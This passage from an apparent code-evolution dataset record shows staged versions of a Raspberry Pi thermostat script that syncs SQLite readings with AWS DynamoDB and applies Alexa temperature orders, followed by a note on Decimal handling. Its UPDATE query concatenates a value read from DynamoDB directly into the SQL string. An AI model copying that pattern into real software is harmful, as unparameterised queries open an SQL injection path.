alexa_order['Item']['desire_temp']))\n conn.commit()\n table_thermostat_alexa_order.delete_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n my_logger.debug('Orden alexa eliminada')\n else:\n my_logger.debug('No hay orden de Alexa')\n time.sleep(5)\n", "step-4": "import boto3\nimport time\nimport datetime\nfrom datetime import date\nimport sqlite3\nimport logging\nimport logging.handlers\nfrom decimal import *\nLOG_FILENAME = 
'/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out'\nmy_logger = logging.getLogger('MyLogger')\nmy_logger.setLevel(logging.DEBUG)\nhandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=25000,\n    backupCount=10)\nformatter = logging.Formatter(\n    '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\nconn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db')\nconn.row_factory = sqlite3.Row\nc = conn.cursor()\nclient = boto3.resource('dynamodb')\ntable_thermostat_status = client.Table('thermostat_status')\ntable_thermostat_alexa_order = client.Table('thermostat_alexa_order')\nwhile 1:\n    c.execute(\n        'SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);')\n    row = c.fetchone()\n    my_logger.debug('Current temp: ' + str(row['temp']) + ' desired temp: ' +\n        str(row['tem_des']) + ' boiler status: ' + str(row['heating']))\n    read_date = row['day']\n    real_temp = row['temp']\n    desire_temp = row['tem_des']\n    heating_status = row['heating']\n    table_thermostat_status.put_item(TableName='thermostat_status', Item={\n        'id': 1, 'desire_temp': Decimal(desire_temp), 'real_temp': Decimal(\n        real_temp), 'status': heating_status, 'status_date': str(datetime.\n        datetime.now())})\n    alexa_order = table_thermostat_alexa_order.get_item(TableName=\n        'thermostat_alexa_order', Key={'id': 1})\n    if 'Item' in alexa_order:\n        my_logger.debug('Alexa order received with temperature = ' + str(\n            alexa_order['Item']['desire_temp']))\n        c.execute('UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=' + str(\n            alexa_order['Item']['desire_temp']))\n        conn.commit()\n        table_thermostat_alexa_order.delete_item(TableName=\n            'thermostat_alexa_order', Key={'id': 1})\n        my_logger.debug('Alexa order deleted')\n    else:\n        my_logger.debug('No Alexa order pending')\n    time.sleep(5)\n", "step-5": "import boto3\nimport time\nimport datetime\nfrom datetime import date\nimport sqlite3\nimport logging\nimport logging.handlers\nfrom decimal import *\n\n### LOGS CONFIGURATION ### \nLOG_FILENAME = '/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out'\n# Set up a specific logger with our desired output level\nmy_logger = logging.getLogger('MyLogger')\nmy_logger.setLevel(logging.DEBUG)\n# Add the log message handler to the logger\nhandler = logging.handlers.RotatingFileHandler(\n    LOG_FILENAME, maxBytes=25000, backupCount=10)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\n\n\n\n### SQLITE3 CONNECTION ###\nconn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db')\n# Allow access to row columns by name\nconn.row_factory = sqlite3.Row\nc = conn.cursor()\n\n\n### CONNECT TO DYNAMODB IN AWS\nclient = boto3.resource('dynamodb')\ntable_thermostat_status = client.Table(\"thermostat_status\")\ntable_thermostat_alexa_order = client.Table(\"thermostat_alexa_order\")\n\n\nwhile 1:\n\t### READ DESIRED AND REAL TEMPERATURE\n\tc.execute(\"SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);\")\n\trow=c.fetchone()\n\tmy_logger.debug(\"Current temp: \" + str(row[\"temp\"]) + \" desired temp: \"+ str(row[\"tem_des\"]) + \" boiler status: \" + str(row[\"heating\"]))\n\tread_date = row[\"day\"]\n\treal_temp = row[\"temp\"]\n\tdesire_temp = row[\"tem_des\"]\n\theating_status = row[\"heating\"]\n\n\ttable_thermostat_status.put_item(TableName='thermostat_status', Item={'id' : 1, 'desire_temp' : Decimal(desire_temp) , 'real_temp' :
Decimal(real_temp) , 'status' : heating_status , 'status_date':str(datetime.datetime.now())})\n \n\t### SEARCH FOR ANY ALEXA ORDER IN AWS DYNAMODB ###\n\talexa_order = table_thermostat_alexa_order.get_item(TableName='thermostat_alexa_order' , Key={'id' : 1})\n\n\tif 'Item' in (alexa_order):\n\t\tmy_logger.debug(\"Alexa order received with temperature = \" + str(alexa_order['Item']['desire_temp']))\n\t\tc.execute(\"UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=\"+str(alexa_order['Item']['desire_temp']))\n\t\tconn.commit()\n\t\ttable_thermostat_alexa_order.delete_item(TableName='thermostat_alexa_order' , Key={'id' : 1})\n\t\tmy_logger.debug(\"Alexa order deleted\")\n\telse:\n\t\tmy_logger.debug(\"No Alexa order pending\")\n\n \n\t### DELAY 5 SECONDS\n\ttime.sleep(5)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
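A note on the Decimal conversions in the thermostat loop above: boto3's DynamoDB interface rejects plain Python floats (it raises a TypeError asking for Decimal instead), and a Decimal built directly from a float carries the float's full binary expansion, which can exceed the 38 digits of precision DynamoDB accepts. Assuming the temperatures come back from sqlite3 as floats, the usual guard is to round-trip through str() before constructing the Decimal; a small demonstration with illustrative values:

from decimal import Decimal

# Building a Decimal straight from a float preserves the binary representation:
print(Decimal(21.1))       # 21.100000000000001421085471520200371742248535156250
# Round-tripping through str() keeps the value compact, which DynamoDB accepts:
print(Decimal(str(21.1)))  # 21.1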